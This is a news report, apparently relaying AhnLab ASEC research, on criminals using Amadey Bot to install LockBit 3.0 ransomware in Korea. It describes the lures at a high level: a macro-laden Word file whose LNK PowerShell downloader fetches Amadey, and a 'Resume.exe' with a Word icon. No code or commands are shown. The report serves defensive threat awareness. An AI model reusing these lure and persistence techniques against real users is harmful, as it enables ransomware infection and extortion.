The ASEC analysis team has confirmed that cybercriminal groups are using Amadey Bot to install LockBit.

Amadey Bot is being distributed through two methods: a malicious Word document file and using an executable that takes the disguise of the Word file icon.

Lockbit ransomware infects files that exist in the user’s environment, changes the desktop, and notifies the user.

AhnLab‘s ASEC analysis team announced that they discovered hackers using Amadey Bot to install LockBit. Amadey Bot, discovered in 2018, steals information and installs additional malware by receiving commands from the attacker. Similar to other popular malware, Amadey Bot is being currently sold in illegal forums and used by various cybercriminal groups.

Word document file

In the past, multiple cybercriminal groups used Amadey Bot disguised as a popular Korean messenger program. Now, it is being distributed using a malicious Word document file and an executable that takes the disguise of the Word file icon.

A document named Sia_Sim.docx is uploaded to VirusTotal. it downloads a Word file that contains a malicious VBA macro from the following URL when run. The text body contains an image that prompts the user to click “Enable Content” to enable the VBA macro. When a user clicks Enable Content button, the VAB macro is executed. It creates an LNK file, which is a downloader running a PowerShell command to download and run Amadey.

In the other method, the malware was found as “Resume.exe.” It is also disguised as a Word file icon. The executable, created by a compression program, is sent as an email attachment. Both methods are using the same C&C server and download URL. It copies itself into the Temp directory, registers to the task scheduler, and can run after a reboot. AhnLab’s ASEC analysis team said,

« Lockbits that are installed via Amadey have been distributed in Korea since 2022, and the team has posted various articles that analyzed the ransomware. The recently confirmed version is LockBit 3.0 which is distributed using keywords such as job application and copyright. Judging from the themes, it appears that the attack is targeting companies. Lockbit ransomware infects files that exist in the user’s environment, changes the desktop as seen below, and notifies the user. It then creates a ransom note in each folder, stating that all data in the system has been encrypted and stolen, and threatening the user that the data will be decrypted and leaked on the Internet if they refuse to pay money. »